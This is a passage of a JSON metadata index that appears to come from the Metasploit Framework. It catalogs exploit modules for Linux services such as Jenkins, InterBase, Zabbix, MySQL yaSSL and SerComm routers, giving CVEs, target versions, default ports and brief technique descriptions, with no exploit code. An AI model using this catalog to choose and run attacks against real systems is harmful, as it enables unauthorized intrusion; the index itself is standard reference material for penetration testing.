"description": "This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The\n vulnerability exists in the pmd service, due to the insecure usage of functions like\n strcpy and strcat while handling stack_option packets with user controlled data. In\n order to bypass ASLR this module uses a proto_tbl packet to leak a libov pointer from\n the stack and finally build the ROP chain to avoid NX.",
"references": [
"CVE-2014-2624",
"ZDI-14-305"
],
"platform": "Unix",
"arch": "cmd",
"rport": 7426,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"HP NNMi 9.10 / CentOS 5",
"HP NNMi 9.20 / CentOS 6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb",
"is_install_path": true,
"ref_name": "linux/misc/hp_nnmi_pmd_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hp_vsa_login_bof": {
"name": "HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",
"full_name": "exploit/linux/misc/hp_vsa_login_bof",
"rank": 300,
"disclosure_date": "2013-06-28",
"type": "exploit",
"author": [
"e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability found in HP's StorageWorks\n P4000 VSA on versions prior to 10.0. The vulnerability is due to an insecure usage\n of the sscanf() function when parsing login requests. This module has been tested\n successfully on the HP VSA 9 Virtual Appliance.",
"references": [
"CVE-2013-2343",
"OSVDB-94701",
"ZDI-13-179",
"URL-http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c03661318"
],
"platform": "Linux",
"arch": "x86",
"rport": 13838,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP VSA 9"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/hp_vsa_login_bof.rb",
"is_install_path": true,
"ref_name": "linux/misc/hp_vsa_login_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/hplip_hpssd_exec": {
"name": "HPLIP hpssd.py From Address Arbitrary Command Execution",
"full_name": "exploit/linux/misc/hplip_hpssd_exec",
"rank": 600,
"disclosure_date": "2007-10-04",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a command execution vulnerability in the hpssd.py\n daemon of the Hewlett-Packard Linux Imaging and Printing Project.\n According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable.\n\n This module was written and tested using the Fedora 6 Linux distribution.\n On the test system, the daemon listens on localhost only and runs with\n root privileges. Although the configuration shows the daemon is to\n listen on port 2207, it actually listens on a dynamic port.\n\n NOTE: If the target system does not have a 'sendmail' command installed,\n this vulnerability cannot be exploited.",
"references": [
"CVE-2007-5208",
"OSVDB-41693",
"BID-26054",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=319921",
"URL-https://bugzilla.redhat.com/attachment.cgi?id=217201&action=edit"
],
"platform": "Unix",
"arch": "cmd",
"rport": 2207,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic (hplip-1.6.7-4.i386.rpm)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/hplip_hpssd_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/hplip_hpssd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/ib_inet_connect": {
"name": "Borland InterBase INET_connect() Buffer Overflow",
"full_name": "exploit/linux/misc/ib_inet_connect",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.",
"references": [
"CVE-2007-5243",
"OSVDB-38605",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Linux",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/ib_inet_connect.rb",
"is_install_path": true,
"ref_name": "linux/misc/ib_inet_connect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/ib_jrd8_create_database": {
"name": "Borland InterBase jrd8_create_database() Buffer Overflow",
"full_name": "exploit/linux/misc/ib_jrd8_create_database",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.",
"references": [
"CVE-2007-5243",
"OSVDB-38606",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Linux",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/ib_jrd8_create_database.rb",
"is_install_path": true,
"ref_name": "linux/misc/ib_jrd8_create_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/ib_open_marker_file": {
"name": "Borland InterBase open_marker_file() Buffer Overflow",
"full_name": "exploit/linux/misc/ib_open_marker_file",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.",
"references": [
"CVE-2007-5244",
"OSVDB-38610",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Linux",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/ib_open_marker_file.rb",
"is_install_path": true,
"ref_name": "linux/misc/ib_open_marker_file",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/ib_pwd_db_aliased": {
"name": "Borland InterBase PWD_db_aliased() Buffer Overflow",
"full_name": "exploit/linux/misc/ib_pwd_db_aliased",
"rank": 400,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.",
"references": [
"CVE-2007-5243",
"OSVDB-38607",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Linux",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/ib_pwd_db_aliased.rb",
"is_install_path": true,
"ref_name": "linux/misc/ib_pwd_db_aliased",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/jenkins_java_deserialize": {
"name": "Jenkins CLI RMI Java Deserialization Vulnerability",
"full_name": "exploit/linux/misc/jenkins_java_deserialize",
"rank": 600,
"disclosure_date": "2015-11-18",
"type": "exploit",
"author": [
"Christopher Frohoff",
"Steve Breen",
"Dev Mohanty",
"Louis Sato",
"wvu <wvu@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Wei Chen"
],
"description": "This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on\n the Jenkins master, which allows remote arbitrary code execution. Authentication is not\n required to exploit this vulnerability.",
"references": [
"CVE-2015-8103",
"URL-https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py",
"URL-https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java",
"URL-http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability",
"URL-https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11"
],
"platform": "Java",
"arch": "java",
"rport": "8080",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Jenkins 1.637"
],
"mod_time": "2019-02-22 17:01:49 +0000",
"path": "/modules/exploits/linux/misc/jenkins_java_deserialize.rb",
"is_install_path": true,
"ref_name": "linux/misc/jenkins_java_deserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/jenkins_ldap_deserialize": {
"name": "Jenkins CLI HTTP Java Deserialization Vulnerability",
"full_name": "exploit/linux/misc/jenkins_ldap_deserialize",
"rank": 600,
"disclosure_date": "2016-11-16",
"type": "exploit",
"author": [
"Matthias Kaiser",
"Alisa Esage",
"Ivan",
"YSOSerial"
],
"description": "This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists in\n Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not\n required to exploit this vulnerability.",
"references": [
"CVE-2016-9299",
"URL-https://github.com/jenkinsci-cert/SECURITY-218",
"URL-https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16",
"URL-http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition",
"URL-https://github.com/frohoff/ysoserial"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": "8080",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Jenkins 2.31"
],
"mod_time": "2018-05-16 05:29:25 +0000",
"path": "/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb",
"is_install_path": true,
"ref_name": "linux/misc/jenkins_ldap_deserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/lprng_format_string": {
"name": "LPRng use_syslog Remote Format String Vulnerability",
"full_name": "exploit/linux/misc/lprng_format_string",
"rank": 300,
"disclosure_date": "2000-09-25",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in the LPRng print server.\n This vulnerability was discovered by Chris Evans. There was a publicly\n circulating worm targeting this vulnerability, which prompted RedHat to pull\n their 7.0 release. They consequently re-released it as \"7.0-respin\".",
"references": [
"CVE-2000-0917",
"OSVDB-421",
"BID-1712",
"US-CERT-VU-382365",
"URL-http://www.cert.org/advisories/CA-2000-22.html",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=17756",
"EDB-226",
"EDB-227",
"EDB-230"
],
"platform": "Linux",
"arch": "x86",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Caldera OpenLinux 2.3 Bruteforce",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/lprng_format_string.rb",
"is_install_path": true,
"ref_name": "linux/misc/lprng_format_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/mongod_native_helper": {
"name": "MongoDB nativeHelper.apply Remote Code Execution",
"full_name": "exploit/linux/misc/mongod_native_helper",
"rank": 300,
"disclosure_date": "2013-03-24",
"type": "exploit",
"author": [
"agix"
],
"description": "This module exploits the nativeHelper feature from spiderMonkey which allows\n remote code execution by calling it with specially crafted arguments. This module\n has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.",
"references": [
"CVE-2013-1892",
"OSVDB-91632",
"BID-58695",
"URL-http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/"
],
"platform": "Linux",
"arch": "",
"rport": 27017,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux - mongod 2.2.3 - 32bits"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/misc/mongod_native_helper.rb",
"is_install_path": true,
"ref_name": "linux/misc/mongod_native_helper",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/nagios_nrpe_arguments": {
"name": "Nagios Remote Plugin Executor Arbitrary Command Execution",
"full_name": "exploit/linux/misc/nagios_nrpe_arguments",
"rank": 600,
"disclosure_date": "2013-02-21",
"type": "exploit",
"author": [
"Rudolph Pereir",
"jwpari <jwpari@beersec.org>"
],
"description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided to remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.",
"references": [
"CVE-2013-1362",
"OSVDB-90582",
"BID-58142",
"URL-http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"
],
"platform": "Unix",
"arch": "cmd",
"rport": 5666,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Nagios Remote Plugin Executor prior to 2.14"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/nagios_nrpe_arguments.rb",
"is_install_path": true,
"ref_name": "linux/misc/nagios_nrpe_arguments",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/netcore_udp_53413_backdoor": {
"name": "Netcore Router Udp 53413 Backdoor",
"full_name": "exploit/linux/misc/netcore_udp_53413_backdoor",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "exploit",
"author": [
"Nixawk",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "Routers manufactured by Netcore, a popular brand for networking\n equipment in China, have a wide-open backdoor that can be fairly\n easily exploited by attackers. These products are also sold under\n the Netis brand name outside of China. This backdoor allows\n cyber criminals to easily run arbitrary code on these routers,\n rendering it vulnerable as a security device.\n Some models include a non-standard echo command which doesn't\n honor -e, and are therefore not currently exploitable with\n Metasploit. See URLs or module markdown for additional options.",
"references": [
"URL-https://www.seebug.org/vuldb/ssvid-90227",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/",
"URL-https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py"
],
"platform": "",
"arch": "",
"rport": 53413,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb",
"is_install_path": true,
"ref_name": "linux/misc/netcore_udp_53413_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/netsupport_manager_agent": {
"name": "NetSupport Manager Agent Remote Buffer Overflow",
"full_name": "exploit/linux/misc/netsupport_manager_agent",
"rank": 200,
"disclosure_date": "2011-01-08",
"type": "exploit",
"author": [
"Luca Carettoni ( <Luca Carettoni (@_ikki)>",
"Evan",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in NetSupport Manager Agent. It\n uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.",
"references": [
"CVE-2011-0404",
"OSVDB-70408",
"BID-45728",
"URL-https://seclists.org/fulldisclosure/2011/Jan/90",
"EDB-15937"
],
"platform": "Linux",
"arch": "x86",
"rport": 5405,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"linux"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/misc/netsupport_manager_agent.rb",
"is_install_path": true,
"ref_name": "linux/misc/netsupport_manager_agent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/novell_edirectory_ncp_bof": {
"name": "Novell eDirectory 8 Buffer Overflow",
"full_name": "exploit/linux/misc/novell_edirectory_ncp_bof",
"rank": 300,
"disclosure_date": "2012-12-12",
"type": "exploit",
"author": [
"David Klein",
"Gary Nilson",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The\n vulnerability exists in the ndsd daemon, specifically in the NCP service, while\n parsing a specially crafted Keyed Object Login request. It allows remote code\n execution with root privileges.",
"references": [
"CVE-2012-0432",
"OSVDB-88718",
"BID-57038",
"EDB-24205",
"URL-http://www.novell.com/support/kb/doc.php?id=3426981",
"URL-https://seclists.org/fulldisclosure/2013/Jan/97"
],
"platform": "Linux",
"arch": "x86",
"rport": 524,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell eDirectory 8.8.7 v20701.33/ SLES 10 SP3"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb",
"is_install_path": true,
"ref_name": "linux/misc/novell_edirectory_ncp_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/opennms_java_serialize": {
"name": "OpenNMS Java Object Unserialization Remote Code Execution",
"full_name": "exploit/linux/misc/opennms_java_serialize",
"rank": 300,
"disclosure_date": "2015-11-06",
"type": "exploit",
"author": [
"Ben Turner <benpturner@yahoo.com>"
],
"description": "This module exploits a vulnerability in the OpenNMS Java object which allows\n an unauthenticated attacker to run arbitrary code against the system.",
"references": [
"CVE-2015-8103",
"URL-http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/"
],
"platform": "",
"arch": "",
"rport": 1099,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"OpenNMS / Linux x86",
"OpenNMS / Linux x86_64"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/misc/opennms_java_serialize.rb",
"is_install_path": true,
"ref_name": "linux/misc/opennms_java_serialize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/qnap_transcode_server": {
"name": "QNAP Transcode Server Command Execution",
"full_name": "exploit/linux/misc/qnap_transcode_server",
"rank": 600,
"disclosure_date": "2017-08-06",
"type": "exploit",
"author": [
"Zenofex",
"0x00string",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an unauthenticated remote command injection\n vulnerability in QNAP NAS devices. The transcoding server listens\n on port 9251 by default and is vulnerable to command injection\n using the 'rmfile' command.\n\n This module was tested successfully on a QNAP TS-431 with\n firmware version 4.3.3.0262 (20170727).",
"references": [
"CVE-2017-13067",
"URL-https://www.exploitee.rs/index.php/QNAP_TS-131",
"URL-http://docs.qnap.com/nas/4.1/Home/en/index.html?transcode_management.htm"
],
"platform": "Linux",
"arch": "armle",
"rport": 9251,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/misc/qnap_transcode_server.rb",
"is_install_path": true,
"ref_name": "linux/misc/qnap_transcode_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/quest_pmmasterd_bof": {
"name": "Quest Privilege Manager pmmasterd Buffer Overflow",
"full_name": "exploit/linux/misc/quest_pmmasterd_bof",
"rank": 300,
"disclosure_date": "2017-04-09",
"type": "exploit",
"author": [
"m0t"
],
"description": "This module exploits a buffer overflow in the Quest Privilege Manager,\n a software used to integrate Active Directory with Linux and Unix\n systems. The vulnerability exists in the pmmasterd daemon, and can only be\n triggered when the host has been configured as a policy server (\n Privilege Manager for Unix or Quest Sudo Plugin). A buffer overflow\n condition exists when handling requests of type ACT_ALERT_EVENT, where\n the size of a memcpy can be controlled by the attacker. This module\n only works against version < 6.0.0-27. Versions up to 6.0.0-50 are also\n vulnerable, but not supported by this module (a stack cookie bypass is\n required). NOTE: To use this module it is required to be able to bind a\n privileged port ( <=1024 ) as the server refuses connections coming\n from unprivileged ports, which in most situations means that root\n privileges are required.",
"references": [
"CVE-2017-6553",
"URL-https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 12345,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Quest Privilege Manager pmmasterd 6.0.0-27 x64",
"Quest Privilege Manager pmmasterd 6.0.0-27 x86"
],
"mod_time": "2017-08-18 00:19:09 +0000",
"path": "/modules/exploits/linux/misc/quest_pmmasterd_bof.rb",
"is_install_path": true,
"ref_name": "linux/misc/quest_pmmasterd_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/sercomm_exec": {
"name": "SerComm Device Remote Code Execution",
"full_name": "exploit/linux/misc/sercomm_exec",
"rank": 500,
"disclosure_date": "2013-12-31",
"type": "exploit",
"author": [
"Eloi Vanderbeken <eloi.vanderbeken@gmail.com>",
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module will cause remote code execution on several SerComm devices.\n These devices typically include routers from NetGear and Linksys.\n This module was tested successfully against several NetGear, Honeywell\n and Cisco devices.",
"references": [
"OSVDB-101653",
"URL-https://github.com/elvanderb/TCP-32764"
],
"platform": "Linux",
"arch": "",
"rport": 32764,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic Linux MIPS Big Endian",
"Generic Linux MIPS Little Endian",
"Manual Linux MIPS Big Endian",
"Manual Linux MIPS Little Endian",
"Cisco WAP4410N",
"Honeywell WAP-PL2 IP Camera",
"Netgear DG834",
"Netgear DG834G",
"Netgear DG834PN",
"Netgear DGN1000",
"Netgear DSG835",
"Netgear WPNT834"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/sercomm_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/sercomm_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/ueb9_bpserverd": {
"name": "Unitrends UEB bpserverd authentication bypass RCE",
"full_name": "exploit/linux/misc/ueb9_bpserverd",
"rank": 600,
"disclosure_date": "2017-08-08",
"type": "exploit",
"author": [
"Jared Arave",
"Cale Smith",
"Benny Husted"
],
"description": "It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,\n has an issue in which its authentication can be bypassed. A remote attacker could use this\n issue to execute arbitrary commands with root privilege on the target system.",
"references": [
"URL-https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755",
"URL-https://nvd.nist.gov/vuln/detail/CVE-2017-12477",
"CVE-2017-12477"
],
"platform": "Linux",
"arch": "x86",
"rport": 1743,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"UEB 9.*"
],
"mod_time": "2017-10-20 19:59:24 +0000",
"path": "/modules/exploits/linux/misc/ueb9_bpserverd.rb",
"is_install_path": true,
"ref_name": "linux/misc/ueb9_bpserverd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/misc/zabbix_server_exec": {
"name": "Zabbix Server Arbitrary Command Execution",
"full_name": "exploit/linux/misc/zabbix_server_exec",
"rank": 600,
"disclosure_date": "2009-09-10",
"type": "exploit",
"author": [
"Nicob <nicob@nicob.net>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the \"Command\" trap in Zabbix Server to execute arbitrary\n commands without authentication. By default the Node ID \"0\" is used; if it doesn't\n work, the Node ID is leaked from the error message and exploitation is retried.\n\n According to the vendor, versions prior to 1.6.9 are vulnerable. The vulnerability\n has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.",
"references": [
"CVE-2009-4498",
"OSVDB-60965",
"BID-37989",
"EDB-10432",
"URL-https://support.zabbix.com/browse/ZBX-1030"
],
"platform": "Unix",
"arch": "cmd",
"rport": 10051,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Zabbix 1.6.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/misc/zabbix_server_exec.rb",
"is_install_path": true,
"ref_name": "linux/misc/zabbix_server_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/mysql/mysql_yassl_getname": {
"name": "MySQL yaSSL CertDecoder::GetName Buffer Overflow",
"full_name": "exploit/linux/mysql/mysql_yassl_getname",
"rank": 400,
"disclosure_date": "2010-01-25",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)\n implementation bundled with MySQL. By sending a specially crafted\n client certificate, an attacker can execute arbitrary code.\n\n This vulnerability is present within the CertDecoder::GetName function inside\n \"taocrypt/src/asn.cpp\". However, the stack buffer that is written to exists\n within a parent function's stack frame.\n\n NOTE: This vulnerability requires a non-default configuration. First, the attacker\n must be able to pass the host-based authentication. Next, the server must be\n configured to listen on an accessible network interface. Lastly, the server\n must have been manually configured to use SSL.\n\n The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing\n on Windows XP SP3, these protections successfully prevented exploitation.\n\n Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is\n present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary\n package were not exploitable due to the use of the compiler's FORTIFY feature.\n\n Although suse11 was mentioned in the original blog post, the binary package they\n provide does not contain yaSSL or support SSL.",
"references": [
"CVE-2009-4484",
"BID-37640",
"BID-37943",
"BID-37974",
"OSVDB-61956",
"URL-http://secunia.com/advisories/38344/"
],
"platform": "Linux",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Debian 5.0 - MySQL (5.0.51a-24+lenny2)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/mysql/mysql_yassl_getname.rb",
"is_install_path": true,
"ref_name": "linux/mysql/mysql_yassl_getname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/mysql/mysql_yassl_hello": {
"name": "MySQL yaSSL SSL Hello Message Buffer Overflow",
"full_name": "exploit/linux/mysql/mysql_yassl_hello",
"rank": 400,
"disclosure_date": "2008-01-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier)\n implementation bundled with MySQL <= 6.0. By sending a specially crafted\n Hello packet, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-0226",
"OSVDB-41195",
"BID-27140"
],
"platform": "Linux",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MySQL 5.0.45-Debian_1ubuntu3.1-log"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/mysql/mysql_yassl_hello.rb",
"is_install_path": true,
"ref_name": "linux/mysql/mysql_yassl_hello",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/pop3/cyrus_pop3d_popsubfolders": {
"name": "Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",
"full_name": "exploit/linux/pop3/cyrus_pop3d_popsubfolders",
"rank": 300,
"disclosure_date": "2006-05-21",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This exploit takes advantage of a stack based overflow. Once the stack\n corruption has occurred, it is possible to overwrite a pointer which is\n later used for a memcpy. This gives us a write anything anywhere condition\n similar to a format string vulnerability.\n\n NOTE: The popsubfolders option is a non-default setting.\n\n I chose to overwrite the GOT with my shellcode and return to it. This\n defeats the VA random patch and possibly other stack protection features.\n\n Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with\n a version containing the vulnerable code, it is not exploitable due to the\n use of the FORTIFY_SOURCE compiler enhancement.",
"references": [
"CVE-2006-2502",
"OSVDB-25853",
"BID-18056",
"EDB-2053",
"EDB-2185",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.html"
],
"platform": "Linux",
"arch": "",
"rport": 110,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Gentoo 2006.0 Linux 2.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb",
"is_install_path": true,
"ref_name": "linux/pop3/cyrus_pop3d_popsubfolders",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/postgres/postgres_payload": {
"name": "PostgreSQL for Linux Payload Execution",
"full_name": "exploit/linux/postgres/postgres_payload",
"rank": 600,
"disclosure_date": "2007-06-05",
"type": "exploit",
"author": [
"midnitesnake",
"egypt <egypt@metasploit.com>",
"todb <todb@metasploit.com>"
],
"description": "On some default Linux installations of PostgreSQL, the\n postgres service account may write to the /tmp directory, and\n may source UDF Shared Libraries from there as well, allowing\n execution of arbitrary code.\n\n This module compiles a Linux shared object file, uploads it to\n the target host via the UPDATE pg_largeobject method of binary\n injection, and creates a UDF (user defined function) from that\n shared object. Because the payload is run as the shared object's\n constructor, it does not need to conform to specific Postgres\n API versions.",
"references": [
"CVE-2007-3280",
"URL-http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt"
],
"platform": "Linux",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": [
"Linux x86",
"Linux x86_64"
],
"mod_time": "2018-07-12 17:34:52 +0000",
